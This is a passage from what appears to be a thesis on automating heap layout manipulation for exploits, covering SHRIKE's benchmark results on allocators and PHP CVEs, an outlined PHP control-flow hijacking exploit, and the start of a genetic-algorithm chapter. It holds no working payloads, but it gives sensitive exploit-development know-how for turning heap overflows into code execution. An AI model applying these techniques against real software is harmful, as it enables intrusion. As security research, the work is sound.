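The constraint that segregated storage imposes on adjacency can be seen in a toy model. The sketch below is illustrative only: the 4KB run size and power-of-two size classes are assumptions for the example, not tcmalloc's actual class map. Each size class bump-allocates within its own run of pages, so only same-class allocations can end up adjacent.

```python
PAGE_RUN = 4096  # assumed size of a run of pages, for illustration

class SegregatedHeap:
    """Toy segregated-storage model: each size class gets its own run of
    pages and allocations are bump-allocated within that run."""
    def __init__(self):
        self.runs = {}       # size class -> [run base, next offset]
        self.next_base = 0
    def malloc(self, size):
        # Round the request up to a power-of-two size class (illustrative).
        cls = max(8, 1 << (size - 1).bit_length())
        if cls not in self.runs:
            self.runs[cls] = [self.next_base, 0]
            self.next_base += PAGE_RUN
        base, off = self.runs[cls]
        self.runs[cls][1] += cls
        return base + off
```

Allocating 64, then 512, then 64 bytes places the two 64-byte buffers adjacent to each other while the 512-byte buffer lands in a separate run, which is why an overflow source can only reach targets in its own size class (run boundaries aside).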

3.5.1 Synthetic Benchmarks

The goal of evaluation on synthetic benchmarks is to discover the factors influencing the difficulty of problem instances and to highlight the capabilities and limitations of my search algorithm in an environment that we precisely control. The benchmarks were constructed as follows:

• In real world scenarios it is often the case that the available interaction sequences are noisy. To investigate how varying noise impacts problem difficulty, I constructed benchmarks in which varying amounts of noise are injected during the allocation of the source and destination. In Table 3.2, a value of N in the ‘Noise’ column means that before and after the first allocation of interest, N allocations of size equal to that of the second allocation of interest are made.

Table 3.2: Synthetic benchmark results after 500,000 candidate solutions generated, averaged across all starting sequences. The full results are in Table 3 in the appendix. All experiments were run 9 times and the results presented are an average.

Allocator        Noise   % Overall Solved   % Natural Solved   % Reversed Solved
avrlibc-r2537      0           100                100                 99
dlmalloc-2.8.6     0            99                100                 98
tcmalloc-2.6.1     0            72                 75                 69
avrlibc-r2537      1            51                 50                 52
dlmalloc-2.8.6     1            46                 60                 31
tcmalloc-2.6.1     1            52                 58                 47
avrlibc-r2537      4            41                 44                 38
dlmalloc-2.8.6     4            33                 49                 17
tcmalloc-2.6.1     4            37                 51                 24

• The heap state is initialised prior to executing the interactions from a candidate by prefixing each candidate with a set of interactions. Previous work [73] has outlined the drawbacks that arise when using randomly generated heap states to evaluate allocator performance. To avoid these drawbacks I captured the initialisation sequences of PHP6, Python and Ruby to use in my benchmarks. A summary of the relevant properties of these initialisation sequences can be found in the appendices in table 1.
• As it is not feasible to evaluate layout manipulation for all possible combinations of source and destination sizes, I selected 6 sizes, deemed to be both likely to occur in real world problems and to exercise different allocator behaviour. The sizes I selected are 8, 64, 512, 4096, 16384 and 65536. For each pair of sizes (x, y) there are four possible benchmarks to be run: x allocated temporally first overflowing into y, x allocated temporally first underflowing into y, y allocated temporally first overflowing into x, and y allocated temporally first underflowing into x. This produces 72 benchmarks to run for each combination of allocator (3), noise (3) and starting state (4), giving 2592 benchmarks in total.
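One way to recover the stated counts of 72 and 2592: distinct-size pairs contribute four benchmarks each (which size is allocated temporally first, crossed with overflow versus underflow), while equal-size pairs contribute only two, since allocation order no longer distinguishes the two buffers. The arithmetic can be checked directly:

```python
from itertools import combinations

sizes = [8, 64, 512, 4096, 16384, 65536]

# Distinct-size pairs: 4 benchmarks each (temporal order x direction).
distinct = 4 * len(list(combinations(sizes, 2)))   # 4 * 15 = 60
# Equal-size pairs: order is irrelevant, leaving overflow and underflow.
equal = 2 * len(sizes)                             # 2 * 6  = 12
per_config = distinct + equal                      # 72 per configuration

# 3 allocators x 3 noise levels x 4 starting states.
total = per_config * 3 * 3 * 4
```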

6PHP makes use of both the system allocator and its own allocator. I captured the initialisation sequences for both.

Figure 3.13: The different layouts produced depending on whether the natural order (left) or reversed order (right) is used, for an allocator that splits from the start of free chunks. In the case on the right the chunks are placed in the wrong order, with the destination before the source.

• For each source and destination combination size, I made available to the analyser an interaction sequence which triggers an allocation of the source size, an interaction sequence which triggers an allocation of the destination size, and interaction sequences for freeing each of the allocations.

The m and r parameters to Algorithm 1 were set to 1000 and .98 respectively7. The g parameter was set to 500,000. A larger value would provide more opportunities for the search algorithm to find solutions, but with 2592 total benchmarks to run, and 500,000 executions taking in the range of 5-15 minutes depending on the number of interactions in the starting state, this was the maximum viable value given my computational resources. The results of the benchmarks averaged across all starting states can be found in Table 3.2, with the full results in the appendices in Table 3.

To understand the ‘% Natural’ and ‘% Reversed’ columns in the results table I must define the concept of the allocation order to corruption direction relationship. I refer to the case of the allocation of the source of an overflow temporally first, followed by its destination, or the allocation of the destination of an underflow temporally first, followed by its source, as the natural relationship. This is because most allocators split space from the start of free chunks and thus, for an overflow, if the source and destination are both split from the same chunk and the source is allocated first then it will naturally end up before the destination. The reverse holds for an underflow. I refer to the relationship as reversed in the case of the allocation of the destination temporally first followed by the source for an overflow, or the allocation of the source temporally first followed by the destination for an underflow.

7To determine reasonable values for these parameters, I constructed a small, distinct set of benchmarks explicitly for this purpose and separate to those used in my evaluation.

Figure 3.14: A solution for the reversed allocation order to corruption direction relationship.

I expected this case to be harder to solve for most allocators, as the solution is more complex than for the natural relationship. A visualisation of this idea can be seen in Figure 3.13. For an allocator that splits chunks from the start of free blocks, the natural order, shown on the left of the figure, of allocating the source and then the destination produces the desired layout, while the reversed order, shown on the right, results in an incorrect layout. A solution for the reversed case is shown in Figure 3.14. A hole is created via a placeholder which can then be used for the source. From the benchmarks a number of points emerge:

• When segregated storage is not in use, as with dlmalloc and avrlibc, and when there is no noise, 98% to 100% of the benchmarks are solved.
• Segregated storage significantly increases problem difficulty. With no noise, the overall success rate drops to 72% for tcmalloc.
• With the addition of a single noisy allocation, the overall success rate drops to close to 50% across all allocators.
• The order of allocation for the source and destination matters. A layout conforming to the natural allocation order to corruption direction relationship was easier to find in all problem instances. With four noisy allocations the success rate for problems involving the natural allocation order ranges from 44% to 51%, but drops to between 17% and 38% for the reversed order. It is also worth noting that the difference in success rate between natural and reversed problem instances is lower for avrlibc than for dlmalloc and tcmalloc. This is because in some situations avrlibc will split space from free chunks from the end instead of from the start. Thus, a reversed order problem can be turned into a natural order problem by forcing the heap into such a state, and this is often easier than solving the reversed order problem.
• I ran each experiment 9 times, and if all 9 × 500,000 executions are taken together then 78% of the benchmarks are solved at least once. In other words, only 22% of the benchmarks were never solved by my approach, which is quite encouraging given the simplicity of the algorithm.
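The natural/reversed distinction, and the placeholder technique of Figure 3.14, can be reproduced with a toy first-fit allocator that splits from the start of free chunks. This is an illustrative model of the behaviour described in the text, not any of the evaluated allocators.

```python
class FirstFitHeap:
    """Toy allocator: first-fit over free chunks, splitting from the start
    of the chosen chunk (the behaviour the natural/reversed distinction
    assumes)."""
    def __init__(self, size=1 << 16):
        self.chunks = [(0, size)]      # (addr, size) free chunks, sorted
    def malloc(self, n):
        for i, (a, s) in enumerate(self.chunks):
            if s >= n:
                self.chunks[i:i + 1] = [(a + n, s - n)] if s > n else []
                return a
        raise MemoryError
    def free(self, a, n):
        self.chunks.append((a, n))
        self.chunks.sort()

# Natural order: source then destination fall out adjacent, source first.
h = FirstFitHeap()
src = h.malloc(64)
dst = h.malloc(64)
assert dst - src == 64

# Reversed order: a placeholder is allocated, the destination placed above
# it, and the placeholder freed so the source lands in the hole below the
# destination -- even though the destination was allocated first.
h = FirstFitHeap()
hole = h.malloc(64)        # placeholder
dst = h.malloc(64)
h.free(hole, 64)           # create the hole
src = h.malloc(64)         # fills the hole, immediately below dst
assert dst - src == 64
```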

3.5.2 PHP-Based Benchmarks

To determine if automatic HLM is feasible in real world scenarios I selected three heap overflow vulnerabilities and ten dynamically allocated structures that were identified by SHRIKE as being potentially useful targets (namely structures that have pointers as their first field). Pairing each vulnerability with each target structure provides a total of 30 benchmarks. For each, I ran an experiment in which SHRIKE was used to search for an input which would place the overflow source and destination structure adjacent to each other. A successful outcome means the system can discover how to interact with the underlying allocator via PHP’s API, identify how to allocate sensitive data structures on the heap, and construct a PHP program which places a selected data structure adjacent to the source of an OOB memory access. This saves an exploit developer a significant amount of effort, allowing them to focus on how to leverage the resulting OOB memory access. My evaluation utilised the following vulnerabilities:

• CVE-2015-8865. An out-of-bounds write vulnerability in libmagic that exists in PHP up to version 7.0.4.
• CVE-2016-5093. An out-of-bounds read vulnerability in PHP up to version 7.0.7, related to string processing and internationalisation.
• CVE-2016-7126. An out-of-bounds write vulnerability in PHP up to version 7.0.10, related to image processing.

The ten target structures are described in the appendix in Table 2 and the full details of all 30 experiments can be found in Table 4. As with the synthetic benchmarks, the m and r arguments to the Search function were set to 1000 and .98 respectively. Instead of limiting the number of executions via the g parameter the maximum run time for each experiment was set to 12 hours. The following summarises the results:

• SHRIKE succeeds in producing a PHP program achieving the required layout in 21 of the 30 experiments run and fails in 9 (a 70% success rate).
• There are 15 noise-free benchmarks of which SHRIKE solves all 15, and 15 noisy benchmarks of which SHRIKE solves 6. This follows what one would expect from the synthetic benchmarks.
• In the successful cases the analysis took on average 571 seconds and 720,000 candidates.

Of the nine benchmarks which SHRIKE does not solve, eight involve CVE-2016-7126. The most likely reason for the difficulty of benchmarks involving this vulnerability is noise in the interaction sequences involved. The source buffer for this vulnerability results from an allocation request of size 1, which PHP rounds up to 8 – an allocation size that is quite common throughout PHP, and prone to occurring as noise. There is a noisy allocation in the interaction sequence which allocates the source buffer itself, several of the interaction sequences which allocate the target structures also have noisy allocations, and all interaction sequences which SHRIKE discovered for making allocations of size 8 involve at least one noisy allocation. For example, the shortest sequence discovered for making an allocation of size 8 is a call to imagecreate(57, 1) which triggers an allocation of size 7360, two allocations of size 8 and two allocations of size 57. In contrast, there is little or no noise involved in the benchmarks utilising CVE-2016-5093 and CVE-2015-8865.

3.5.3 Generating a Control-Flow Hijacking Exploit for PHP

To show that SHRIKE can be integrated into the development of a full exploit I selected another vulnerability in PHP. CVE-2013-2110 allows an attacker to write a NULL byte immediately after the end of a heap-allocated buffer. One must utilise that NULL byte write to corrupt a location that will enable more useful exploitation primitives. My aim is to convert the NULL byte write into both an information leak to defeat ASLR and the ability to modify arbitrary memory locations. I first searched SHRIKE’s database for interaction sequences that allocate structures that have a pointer as their first field. This led me to the imagecreate function which creates a gdImage structure. This structure uses a pointer to an array of pointers to represent a grid of pixels in an image. By corrupting this pointer via the NULL byte write, and then allocating a buffer they control at the location it points to post-corruption, an attacker can control the locations that are read and written from when pixels are read and written.

Listing 3.4 shows the template provided to SHRIKE. In less than 10 seconds SHRIKE finds an input that places the source immediately prior to the destination. Thus the pointer that is the first field of the gdImage structure is corrupted. Listing 1 in the appendices shows part of the generated solution. After the corruption occurs the required memory read and write primitives can be achieved by allocating a controllable buffer into the location where the corrupted pointer now points. For brevity I have left out the remaining details of the exploit, but it can be found in full in the SHRIKE repository8. The end result is a PHP script that hijacks the control flow of the interpreter and executes native code controlled by the attacker.

3.5.4 Research Questions

RQ1: What factors most significantly impact the difficulty of the heap layout manipulation problem in a deterministic setting? The following factors had the most significant impact on problem difficulty:

• Noise. In the synthetic benchmarks, noise clearly impacts difficulty. As more noise is added, more holes typically have to be created. In the worst case (dlmalloc) we see a drop off from a 99% overall success rate to 33% when four noisy allocations are included. A similar success rate is seen for avrlibc and tcmalloc with four noisy allocations. In the evaluation on PHP noise again played a significant role, with SHRIKE solving 100% of noise-free instances and 40% of noisy instances.
• Segregated storage. In the synthetic benchmarks segregated storage leads to a decline in the overall success rate on noise-free instances from 99-100% to 72%.
• Allocation order to corruption direction relationship. For all configurations of allocator, noise and starting state, the problems involving the natural order were easier. For the noise-free instances on avrlibc and dlmalloc the difference in terms of solved problems is just 1-2%, but as noise is introduced the success rate between the natural and reversed benchmarks diverges. For dlmalloc with four noisy allocations the success rate for the natural order is 49% but only 17% for the reversed order, a difference of 32%.

RQ2: Is pseudo-random search an effective approach to heap-layout manipulation?

8https://github.com/SeanHeelan/HeapLayout

Without segregated storage, when there is no noise then 99-100% of problems were solved, with most experiments taking 15 seconds or less. As noise is added the rate of success drops to 51% and 46% for a single noisy allocation, for avrlibc and dlmalloc respectively, and then to 41% and 33% for four noisy allocations. The extra constraints imposed on layout by segregated storage present more of a challenge. On noise-free runs the rate of success is 72% and drops to 52% and 37% as one and four noisy allocations, respectively, are added. However, as noted in section 3.5.1, if all 9 runs of each experiment are considered together then 78% of the benchmarks are solved at least once.

On the synthetic benchmarks it is clear that the effectiveness of pseudo-random search varies depending on whether segregated storage is in use, the amount of noise, the allocation order to corruption direction relationship and the available computational resources. In the best case, pseudo-random search can solve benchmarks in seconds, while in the more difficult ones it still attains a high enough success rate to be worthwhile given its simplicity. When embedded in SHRIKE, the pseudo-random search approach also proved effective, with similar caveats relating to noise. 100% of noise-free problems were solved, while 40% of those involving noise were. On average the search took less than 10 minutes and 750,000 candidates, for instances on which it succeeded.

RQ3: Can heap layout manipulation be automated effectively for real-world programs?

My experiments with PHP indicate that automatic HLM can be performed effectively for real world programs. As mentioned in RQ2, SHRIKE had a 70% success rate overall, and a 100% success rate in cases where there was no noise.
SHRIKE demonstrates that it is possible to automate the process in an end-to-end manner, with automatic discovery of a mapping from the target program’s API to interaction sequences, discovery of interesting corruption targets, and search for the required layout. Furthermore, SHRIKE’s template-based approach shows that a system with these capabilities can be naturally integrated into the exploit development process.

3.5.5 Generalisability

Regarding generalisability, my experiments are not exhaustive and care must be taken in extrapolating to benchmarks besides those presented. However, I believe that the presented search algorithm and architecture for SHRIKE are likely to work similarly well with other language interpreters. SHRIKE depends firstly on some means to discover language constructs and correlate them with their resulting

allocator interactions, and secondly on a search algorithm that can piece together these fragments to discover a required layout. The approach used in SHRIKE to solve the first problem is based on previous work on vulnerability detection that has been shown to work on interpreters for Javascript and Ruby, as well as PHP [84, 85]. My extensions, namely a different approach to fuzzing as well as instrumentation to record allocator interactions, do not threaten the underlying assumptions of the prior work. My solution to the second problem, namely the random search algorithm, has demonstrated its capabilities on a diverse set of benchmarks. Thus, I believe it is reasonable to expect similar results versus targets that rely on allocators with a similar architecture.

3.5.6 Threats to Validity

The results on the synthetic benchmarks are impacted by the choice of source and destination sizes. There may be combinations of these that produce layout problems that are significantly more or less difficult to solve. A different set of starting sequences, or available interaction sequences, may also impact the results. I have attempted to mitigate these issues by selecting diverse sizes and starting sequences, and allowing the analysis engine to utilise only a minimal set of interaction sequences. The results on PHP are affected by the choice of vulnerabilities and target data structures, and I could have inadvertently selected for cases that are outliers. I have attempted to mitigate this possibility by utilising ten different target structures and vulnerabilities in three completely different sub-components of PHP. The restriction of the evaluation to a language interpreter also poses a threat to generalisability, as the available interaction sequences may differ in other classes of software. I have attempted to mitigate this threat by limiting the interaction sequences used to those that contain an allocation of a size equal to one of the allocation sizes found in the sequences which allocate the source and destination.

Extinction is the rule. Survival is the exception.
— Carl Sagan, The Varieties of Scientific Experience: A Personal View of the Search for God

4 A Genetic Algorithm for the Heap Layout Problem

4.1 Introduction

In Chapter 3 I introduced the heap layout problem and a solution to it based on random search. Random search has the advantage of being both conceptually and practically straightforward, while still being effective. However, by its nature it is also quite wasteful. It is common to randomly generate an input that is almost correct, and perhaps just needs minor modifications to produce a valid solution. Random search has no means to rank and build on such previously generated inputs, so they are simply discarded.

Fortunately, there are a number of different approaches that do provide frameworks for more efficient solutions to search problems1. One such approach is Genetic Algorithms (GAs), which are flexible methods for exploring a search space, loosely based around ideas from the theory of evolution in biological systems. The concepts were first outlined almost fifty years ago by Holland [89], and Beasley [90] provides a comprehensive introduction to the fundamentals. At a high level GAs are quite straightforward, and so here I briefly introduce the intuitions before detailing how I use a GA to solve heap layout problems.

A GA operates on a population of individuals, where each individual represents a candidate solution to the problem at hand. Each individual has a score associated

1As an alternative to a genetic algorithm I also considered simulated annealing, but decided to use a GA after reviewing the literature, where better results for GAs are generally reported, at an increased computational cost [86–88].

with it, called its ‘fitness’, and the GA is generally trying to evolve individuals with higher and higher fitness scores. On each iteration of the algorithm a new population is produced from the existing population by either mutating a single individual, or constructing a new individual from the information found in two existing individuals. These new individuals are scored and, from them and possibly the previous population, a new population is selected. This process mimics the evolutionary idea of ‘survival of the fittest’, with more fit individuals providing most of the material used in producing subsequent generations.

While there are obvious downsides to the failure of random search to leverage information found in almost-correct solutions, we also want to avoid an algorithm that can only perform local search around an existing set of solutions. In search problems, the ‘exploitation versus exploration trade-off’ [91] refers to the balance that the algorithm must strike between using the information found in existing solutions to find better solutions (exploitation) and branching out into more diverse parts of the search space in order to find a better route to a solution (exploration). A search algorithm that is too skewed towards exploitation risks getting stuck in local minima, while one that is too skewed towards exploration will fail to converge.

In GAs there is no single parameter or algorithmic choice that controls the balance between exploration and exploitation. Instead, a number of parameters and design choices must be taken into account [92]. Some examples are the mutation rate, which controls the number of mutations made to an individual to produce a new individual, the selection algorithm used to decide which individuals make it through to the next generation, and the probability with which cross-over is chosen instead of mutation as the means by which to produce a new individual.
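To make these moving parts concrete, the following is a minimal, self-contained GA for a toy problem: maximising the number of set bits in a bitstring. It is purely illustrative and is not the system described in this chapter; all names and parameter values are my own, but it shows where the mutation rate, crossover probability and selection scheme sit in the loop.

```python
import random

def one_max_ga(length=32, pop_size=40, generations=60,
               mut_rate=0.05, cx_prob=0.7, tourn_size=3, seed=0):
    """Toy GA maximising the number of 1-bits in a bitstring (OneMax)."""
    rng = random.Random(seed)

    def fitness(ind):
        return sum(ind)

    pop = [[rng.randint(0, 1) for _ in range(length)] for _ in range(pop_size)]

    def tournament():
        # Selection: best of a small random sample of the population.
        return max(rng.sample(pop, tourn_size), key=fitness)

    for _ in range(generations):
        children = []
        while len(children) < pop_size:
            child = tournament()[:]              # exploitation: copy a fit parent
            if rng.random() < cx_prob:           # crossover mixes two parents
                other = tournament()
                point = rng.randrange(1, length)
                child = child[:point] + other[point:]
            for i in range(length):              # mutation rate controls exploration
                if rng.random() < mut_rate:
                    child[i] ^= 1
            children.append(child)
        pop = children
    return max(pop, key=fitness)

best = one_max_ga()
```

Raising `mut_rate` or lowering `tourn_size` shifts the balance towards exploration; the reverse shifts it towards exploitation.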
In the remainder of this chapter I will discuss components that make up the GA, the various parameters that may be set which influence its operation, and the experiments I performed to test its effectiveness at solving heap layout problems. These experiments demonstrate that the GA is comprehensively more effective and efficient at solving heap layout problems than random search.

4.2 Genetic Algorithm

The GA for heap layout problems is designed to be agnostic to the target application, available interaction sequences and the heap allocator in use. The main loop of the GA is shown in Algorithm 3, and is based on a standard (µ + λ) evolutionary algorithm [93]. This means that on each iteration of the GA, λ children are produced and then the next generation is created by selecting µ individuals from a combination

Algorithm 3 Genetic algorithm main loop
1: function EvoHeap(g, popsz, µ, λ, mxpb, cxpb)
2:     pop ← InitialisePopulation(popsz)
3:     popF ← Evaluate(pop)
4:     if SolutionFound(popF) then
5:         return pop, popF
6:     while g > 0 do
7:         ch ← GetChildren(pop, λ, mxpb, cxpb)
8:         chF ← Evaluate(ch)
9:         if SolutionFound(chF) then
10:            return ch, chF
11:        pop, popF ← Select(µ, pop + ch, popF + chF)
12:        g ← g − 1
13:    return pop, popF

14: function GetChildren(pop, λ, mxpb, cxpb)
15:     children ← []
16:     while λ > 0 do
17:         parentA ← pop[Random(0, len(pop))]
18:         r ← Random(0, 1)
19:         if r < mxpb then
20:             new ← Mutate(parentA)
21:         else if r < mxpb + cxpb then
22:             parentB ← pop[Random(0, len(pop))]
23:             new ← Crossover(parentA, parentB)
24:         else
25:             new ← parentA
26:         children.append(new)
27:         λ ← λ − 1
28:     return children

of the current generation and the λ children. The EvoHeap function drives the execution of the GA, and is relatively self-explanatory. The parameters are as follows: g is the number of generations to run, popsz is the population size, µ and λ are as just explained, mxpb is the probability of mutation being used to produce a child, and cxpb is the probability of crossover being used to produce a child.

The GA begins by creating a population of individuals (line 2) and evaluating their fitness (line 3). On each iteration of the GA, λ children are produced (line 7) and evaluated (line 8). If any of the children are a solution to the heap layout problem then the GA early-exits (line 10). Otherwise a new population of size µ is selected from the existing population and the new children (line 11), and the process repeats.

The λ children are produced in the GetChildren function. On each iteration of its loop an individual is randomly2 selected from the current population (line 17). The child is then produced by either mutation of the individual (line 20), crossover between this individual and another (lines 22-23), or simply by copying the individual (line 25).

The EvoHeap and GetChildren functions use a number of support functions for population initialisation (InitialisePopulation), evaluation (Evaluate), selection (Select), mutation (Mutate) and crossover (Crossover). In the remainder of this section I explain the details of these functions.

A key requirement of the GA is that it be agnostic to the target programs whose heap layout we are manipulating. We do not want to have to change the core of the GA for each target. For instance, the core operators in the GA should not need to know how to manipulate PHP code, or Python code, or be tied to the specifics of any interpreter for such code.
To achieve this we need a target-agnostic representation of the genetic algorithm population, core operators that manipulate this representation, and a means by which this representation can be converted into the language used by the target application. I begin by giving a high-level overview of how the GA is architected to achieve this target-agnostic behaviour (Section 4.2.1), followed by the specifics of how individuals are represented (Section 4.2.2), and then continue with the details of the core functions of the GA.
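The shape of Algorithm 3 can be sketched as an ordinary Python function. This is a simplified sketch, not the actual implementation: the problem-specific callbacks are placeholders for the machinery described later in this chapter, and plain truncation selection stands in for the elitism-plus-double-tournament Select of Section 4.2.6.

```python
import random

def evo_heap(init, evaluate, mutate, crossover, is_solution,
             g=100, popsz=20, mu=20, lam=20, mxpb=0.9, cxpb=0.1, seed=0):
    """Minimal (mu + lambda) loop mirroring Algorithm 3."""
    rng = random.Random(seed)
    pop = [init(rng) for _ in range(popsz)]
    popF = [evaluate(ind) for ind in pop]
    while g > 0:
        ch = []
        for _ in range(lam):                       # produce lambda children
            parentA = rng.choice(pop)
            r = rng.random()
            if r < mxpb:
                new = mutate(rng, parentA)
            elif r < mxpb + cxpb:
                new = crossover(rng, parentA, rng.choice(pop))
            else:
                new = list(parentA)                # plain copy
            ch.append(new)
        chF = [evaluate(c) for c in ch]
        if any(is_solution(f) for f in chF):       # early exit on a solution
            return ch, chF
        # Keep the mu fittest (minimising) of parents plus children.
        ranked = sorted(zip(pop + ch, popF + chF), key=lambda p: p[1])[:mu]
        pop, popF = [p for p, _ in ranked], [f for _, f in ranked]
        g -= 1
    return pop, popF
```

Instantiated on any minimisation problem (fitness 0 meaning solved), the loop steadily drives the best fitness in the population downwards.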

4.2.1 Target-Agnostic Operation

Figure 4.1 gives a high-level overview of how the GA achieves its target-agnostic operation. The process begins with the creation of a fragment database. In Section 3.4.2 I described how code fragments can be automatically discovered that trigger allocator interactions. This same process is used to discover code fragments for use by the GA. Each fragment is assigned a unique ID within the fragment database, and a list of these IDs is provided to the GA3. The GA then operates exclusively on the fragment IDs, without any knowledge of the code fragments that they correspond to. As will be explained in Section 4.2.2, each individual in the population consists of a list of directives that may reference a particular code fragment by its ID. For example, in Figure 4.1 the first individual in the population consists of four directives (two allocations, a free and an allocation). The argument to each allocation directive is the ID of the fragment to use, so the

2 Random(x, y) generates a random number between x and y − 1.
3 In reality, extra meta-data is also provided along with each ID to allow the GA to prioritise code fragments that allocate chunks with a size equal to the source or destination chunks, but for now we can just assume that all code fragments are considered with equal probability. In Section 4.2.2 the details of how fragments are prioritised are provided.

[Figure body: three columns — the GA population of directives (e.g. x0 = Alloc(0); x1 = Alloc(0); free(x0); x2 = Alloc(N)), the candidate solutions they convert to (e.g. $x0 = create_image(10, 10); $x0 = 0;), and the fragment database mapping IDs to code fragments (0 → create_image(10, 10), 1 → str_repeat('A', 2), N → array(10, 10)).]

Figure 4.1: Overview of how the GA achieves its target-agnostic operation.

first directive (x0 = Alloc(0)) means ‘Use create_image(10, 10) to trigger heap allocations and associate its result with the variable x0’.

In order to assign a fitness score to an individual it must be converted into a valid input, called a candidate solution in Figure 4.1, for the target program. A conversion function must be provided that takes a list of directives referencing code fragment IDs, and produces a valid program. One such function per language must be written. The user also needs to provide a function to execute the resulting program and record the distance between the source and destination allocation that will be produced by the interpreter. One such function per interpreter must be written.

Thus, porting the GA to a new target language and interpreter requires a fragment database for that language, a conversion function from GA individuals to valid programs in that language, and a function to execute the interpreter on an input program. No changes are required to the GA's internal representation or its operations.
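A per-language conversion function of this kind can be sketched as follows. The fragment database contents and the directive encoding here are illustrative, modelled on Figure 4.1, and are not the actual fragments or representation used by my implementation.

```python
# Hypothetical fragment database: fragment ID -> PHP expression that triggers
# heap allocator interactions (contents modelled on Figure 4.1).
FRAGMENTS = {
    0: "create_image(10, 10)",
    1: "str_repeat('A', 2)",
}

def to_php(directives):
    """Convert a list of ('alloc', fragment_id) / ('free', variable_index)
    directives into a candidate PHP program."""
    lines = []
    for i, (kind, arg) in enumerate(directives):
        if kind == "alloc":
            lines.append("$x%d = %s;" % (i, FRAGMENTS[arg]))
        else:
            # 'free': drop the only reference so the interpreter frees the chunk.
            lines.append("$x%d = 0;" % arg)
    return "\n".join(lines)
```

For example, `to_php([("alloc", 0), ("alloc", 0), ("free", 0), ("alloc", 1)])` produces the first candidate solution shown in Figure 4.1.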

4.2.2 Individual Representation

A genetic algorithm requires a population of individuals to apply genetic operators to, and from which to derive the next generation. In our case, each individual represents a candidate solution to the heap layout problem. Thus, each individual will be made up of a series of items that can be translated into an input to the target application, to cause an allocation or a free. To achieve this, each individual is made up of a variable length list of target-agnostic directives. The available directives are as follows:

Bits:                 [ 0-7  | 8-23 | 24-31      | 32-39     | 40-63    | 64-127        ]
Allocate:             [ Type | -    | Size Group | Sub Group | Selector | Allocation ID ]
Allocate in loop:     [ Type | Rep  | Size Group | Sub Group | Selector | Loop ID       ]
Free:                 [ Type | -    | -          | -         | -        | Allocation ID ]
Source, Destination:  [ Type | -    | -          | -         | -        | -             ]

Figure 4.2: Each directive in an individual is represented by a 128-bit integer. The first 8 bits always determine the directive's type, and the significance of the remaining bits varies depending on the directive.

• Allocate: Indicates that a particular interaction sequence that results in an allocation should be triggered.

• Free: Indicates that the pointer resulting from a particular previous allocation should be freed.

• Allocate in a loop: Indicates that a particular interaction sequence that results in an allocation should be executed in a loop a particular number of times.

• Allocate the overflow source: Indicates that the interaction sequence that contains the allocation of the overflow source should be triggered.

• Allocate the overflow destination: Indicates that the interaction sequence that contains the allocation of the overflow destination should be triggered.

On initialisation, the system in which the GA is embedded can assign an ID to every interaction sequence that is available to it and provide these IDs to the GA. The GA then operates exclusively on the IDs. With this in place, the core GA operators can work directly on these directives and IDs in a target-agnostic manner, and all that must be provided for each new target is a function to translate IDs back into valid code fragments. In terms of implementation, each directive in an individual is represented by a 128-bit integer, and an individual is simply an array of such integers. The significance of the bits varies depending on the directive's type, except for the

first 8 bits, which always provide the type of the directive. Figure 4.2 shows the per-directive representation, and the meaning of the other fields is as follows:

• Allocate: As discussed in Chapter 3, some code fragments trigger interaction sequences that are usually more desirable than others. For example, if we wish to allocate a buffer of size 8 and there is one fragment that triggers a single allocation of size 8, and another that triggers 2048 allocations of size 8, then in most scenarios we would want to favour the fragment allowing for more granular control. However, in another situation the fragment that triggers 2048 allocations may actually be more desirable. To support selecting fragments according to a non-uniform distribution the system allows the user to provide categories of fragments, and associated probabilities. This is the role of the ‘Size Group’, ‘Sub Group’ and ‘Selector’ fields. A ‘Size Group’ is a set of fragments associated with a range of sizes. For example, if the source buffer is of size 8 and the destination buffer is of size 128, and we know that the allocator rounds to multiples of 16, then we might want to use fragments that make allocations with sizes in the range 0-15 and 128-143. 2^7 different ‘Size Groups’ are allowed, and one is selected according to a uniform distribution when an Allocate directive is created. Within each size group there are then ‘Sub Groups’ that can be used to categorise fragments that we would like to be selected with different probabilities. 2^7 different ‘Sub Groups’ per ‘Size Group’ are allowed, but the system currently only makes use of two: a sub-group of fragments that make an allocation of the desired size and make the fewest other allocations, and a sub-group containing all other fragments that make an allocation of the desired size. The first sub-group is selected with a probability of 0.995 (footnote 4), and the latter the rest of the time. Finally, the ‘Selector’ field identifies the exact fragment within the selected ‘Size Group’ and ‘Sub Group’ to use, and its value is chosen according to a uniform distribution.
2^23 different fragments per ‘Sub Group’ per ‘Size Group’ are allowed. Bits 64-127 then provide the ID for this allocation. The system uses 64-bit randomly generated identifiers to allow crossover and mutation to operate without needing to worry about ID collision when transposing or mutating genes.

4 This value is selected based on the intuition, validated by my experiments with random search, that we usually want to use the fragments that contain a minimal amount of noise, while allowing for the possibility that there may be some value in rarely using fragments that trigger a larger set of allocations.

• Allocate in a loop: The fields for a directive to allocate in a loop are identical to the allocate directive, except bits 8-23 provide the repeat count for the loop.

• Free: A ‘Free’ directive only makes use of the type field and the upper 64 bits, which identify the allocation to free.

• Source, Destination: The directives indicating that the source or destination should be allocated only make use of the type field.
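The bit-field layout of Figure 4.2 can be sketched with ordinary integer arithmetic. The field offsets follow the figure; the concrete type codes and helper names are my own, illustrative choices.

```python
# Illustrative directive type codes (bits 0-7 of each 128-bit directive).
T_ALLOC, T_ALLOC_LOOP, T_FREE, T_SRC, T_DST = range(5)

def pack_alloc(size_group, sub_group, selector, alloc_id):
    """Build an Allocate directive as a single (arbitrary-precision) integer."""
    return (T_ALLOC                 # bits 0-7:    directive type
            | (size_group << 24)    # bits 24-31:  'Size Group'
            | (sub_group << 32)     # bits 32-39:  'Sub Group'
            | (selector << 40)      # bits 40-63:  'Selector'
            | (alloc_id << 64))     # bits 64-127: random 64-bit allocation ID

def field(directive, lo, hi):
    """Extract bits lo..hi (inclusive) from a directive."""
    return (directive >> lo) & ((1 << (hi - lo + 1)) - 1)
```

Python integers are unbounded, so the full 128-bit value fits in one object; a C implementation would use a pair of `uint64_t` fields instead.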

4.2.3 Population Initialisation

Each individual is initialised to a random series of directives from Section 4.2.2. The ratio of allocations to frees is controlled by a parameter to the GA.

4.2.4 Genetic Operators

Mutation

When the Mutate function is called with an individual, one or more mutation operations are applied. The number of operations to be applied is capped at a maximum and is calculated based on a probability d, 0 < d ≤ 1, that decays geometrically. For instance, the probability of one mutation being applied is d, the probability of two mutations being applied is d · d, and so on. The mutation operators to apply are then selected probabilistically from the following list, based on probabilities provided by the user:

